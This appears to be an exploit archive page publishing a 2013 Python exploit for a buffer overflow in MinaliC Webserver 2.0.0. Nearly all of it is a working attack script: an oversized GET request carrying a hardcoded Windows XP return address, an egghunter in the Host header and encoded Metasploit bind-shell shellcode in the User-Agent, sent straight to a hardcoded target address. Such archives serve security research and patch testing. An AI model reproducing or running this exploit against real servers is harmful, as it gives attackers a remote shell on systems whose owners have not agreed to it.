seeing is believing

MinaliC Webserver 2.0.0 Buffer Overflow

MinaliC Webserver 2.0.0 Buffer Overflow
Posted Aug 13, 2013
Authored by PuN1sh3r

MinaliC Webserver version 2.0.0 buffer overflow exploit with egg-hunting shellcode.

tags | exploit, overflow, shellcode
MD5 | 686b52d239be88aeb3d6a8a6defbcd7f

MinaliC Webserver 2.0.0 Buffer Overflow

Change Mirror Download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86

#!/usr/bin/env python

# Exploit Title: MinaliC Webserver buffer overflow (egghunter)
# Date: August 13 2013
# Exploit Author: PuN1sh3r
# Email: luiguibiker@gmail.com
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP3, English
#
# Description:
# Remote command execution by triggering a buffer overflow in the GET
# request along with some buffer gymnastics using egghunters in order to attain a shell .
# gr33zt to superkojiman for the initial exploit

import socket
# windows/shell_bind_tcp http://www.metasploit.com
# * VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=process,InitialAutoRunScript=, AutoRunScript=

shellcode = (
"\x89\xe7\xda\xc0\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x49\x6c\x49\x78\x6b\x39\x37\x70\x33\x30\x77\x70\x43\x50\x4d"
"\x59\x38\x65\x44\x71\x6b\x62\x73\x54\x6e\x6b\x61\x42\x34\x70"
"\x4c\x4b\x43\x62\x74\x4c\x6c\x4b\x36\x32\x56\x74\x4c\x4b\x72"
"\x52\x75\x78\x44\x4f\x68\x37\x70\x4a\x67\x56\x66\x51\x4b\x4f"
"\x34\x71\x4b\x70\x4c\x6c\x55\x6c\x61\x71\x51\x6c\x63\x32\x76"
"\x4c\x77\x50\x4b\x71\x4a\x6f\x34\x4d\x47\x71\x58\x47\x5a\x42"
"\x58\x70\x70\x52\x33\x67\x4c\x4b\x53\x62\x52\x30\x4e\x6b\x30"
"\x42\x65\x6c\x57\x71\x68\x50\x4c\x4b\x77\x30\x62\x58\x6d\x55"
"\x49\x50\x71\x64\x30\x4a\x56\x61\x5a\x70\x42\x70\x4c\x4b\x52"
"\x68\x66\x78\x6c\x4b\x42\x78\x45\x70\x56\x61\x6a\x73\x79\x73"
"\x35\x6c\x77\x39\x4c\x4b\x77\x44\x6c\x4b\x76\x61\x4e\x36\x65"
"\x61\x6b\x4f\x34\x71\x69\x50\x4e\x4c\x7a\x61\x38\x4f\x54\x4d"
"\x63\x31\x4a\x67\x76\x58\x79\x70\x34\x35\x6a\x54\x55\x53\x61"
"\x6d\x7a\x58\x35\x6b\x61\x6d\x31\x34\x43\x45\x58\x62\x30\x58"
"\x4c\x4b\x73\x68\x44\x64\x47\x71\x6e\x33\x62\x46\x4c\x4b\x66"
"\x6c\x30\x4b\x4e\x6b\x32\x78\x55\x4c\x63\x31\x48\x53\x4c\x4b"
"\x63\x34\x4e\x6b\x75\x51\x38\x50\x4b\x39\x62\x64\x61\x34\x71"
"\x34\x61\x4b\x63\x6b\x61\x71\x63\x69\x53\x6a\x76\x31\x59\x6f"
"\x4d\x30\x33\x68\x31\x4f\x30\x5a\x4c\x4b\x37\x62\x48\x6b\x4d"
"\x56\x63\x6d\x53\x58\x36\x53\x70\x32\x73\x30\x57\x70\x32\x48"
"\x74\x37\x71\x63\x37\x42\x33\x6f\x43\x64\x73\x58\x30\x4c\x61"
"\x67\x45\x76\x76\x67\x79\x6f\x58\x55\x38\x38\x6e\x70\x65\x51"
"\x63\x30\x33\x30\x57\x59\x4b\x74\x31\x44\x76\x30\x51\x78\x54"
"\x69\x4f\x70\x52\x4b\x33\x30\x6b\x4f\x79\x45\x56\x30\x32\x70"
"\x76\x30\x56\x30\x43\x70\x56\x30\x53\x70\x36\x30\x51\x78\x49"
"\x7a\x54\x4f\x59\x4f\x79\x70\x4b\x4f\x4a\x75\x6d\x59\x6b\x77"
"\x54\x71\x4b\x6b\x76\x33\x65\x38\x76\x62\x73\x30\x45\x51\x4d"
"\x6b\x4c\x49\x4a\x46\x53\x5a\x64\x50\x71\x46\x50\x57\x52\x48"
"\x68\x42\x4b\x6b\x34\x77\x65\x37\x4b\x4f\x4e\x35\x33\x63\x42"
"\x77\x35\x38\x38\x37\x6b\x59\x44\x78\x6b\x4f\x49\x6f\x6e\x35"
"\x33\x63\x73\x63\x50\x57\x65\x38\x64\x34\x7a\x4c\x45\x6b\x6d"
"\x31\x59\x6f\x79\x45\x61\x47\x6e\x69\x6a\x67\x65\x38\x70\x75"
"\x52\x4e\x62\x6d\x63\x51\x79\x6f\x48\x55\x51\x78\x53\x53\x42"
"\x4d\x51\x74\x65\x50\x6e\x69\x6a\x43\x36\x37\x53\x67\x53\x67"
"\x50\x31\x39\x66\x50\x6a\x45\x42\x62\x79\x43\x66\x48\x62\x59"
"\x6d\x72\x46\x78\x47\x37\x34\x37\x54\x47\x4c\x33\x31\x65\x51"
"\x4e\x6d\x57\x34\x64\x64\x54\x50\x59\x56\x57\x70\x70\x44\x33"
"\x64\x70\x50\x73\x66\x61\x46\x33\x66\x67\x36\x53\x66\x50\x4e"
"\x42\x76\x43\x66\x72\x73\x56\x36\x62\x48\x71\x69\x48\x4c\x45"
"\x6f\x6d\x56\x59\x6f\x78\x55\x4c\x49\x49\x70\x42\x6e\x30\x56"
"\x47\x36\x59\x6f\x66\x50\x72\x48\x63\x38\x4d\x57\x65\x4d\x33"
"\x50\x6b\x4f\x4e\x35\x4d\x6b\x48\x70\x48\x35\x4f\x52\x63\x66"
"\x72\x48\x4f\x56\x4c\x55\x6d\x6d\x4f\x6d\x39\x6f\x5a\x75\x57"
"\x4c\x33\x36\x71\x6c\x37\x7a\x4d\x50\x79\x6b\x59\x70\x72\x55"
"\x54\x45\x4d\x6b\x43\x77\x55\x43\x72\x52\x42\x4f\x61\x7a\x57"
"\x70\x36\x33\x49\x6f\x5a\x75\x41\x41"
)
# Return addres Note:
# 77C11F13 JMP EBX on msvcrt.dll Windows XP SP3 English
ret = "\x13\x1F\xC1\x77"
junk = "\x41" * 245 + ret
host = "\x90" * 30 + "A" * 40 + "\x90" * 31

egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
buf = "GET /" + junk + " HTTP/1.1\r\n" + "Host: " + "\x90" * (100 - len(egg)) + egg + "\r\n"
buf += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf += "User-Agent: " + "T00W" + "T00W" + "\x90" * (900 - len(shellcode)) + shellcode + "\r\n\r\n"
print buf
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.5", 8080))
s.send(buf)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close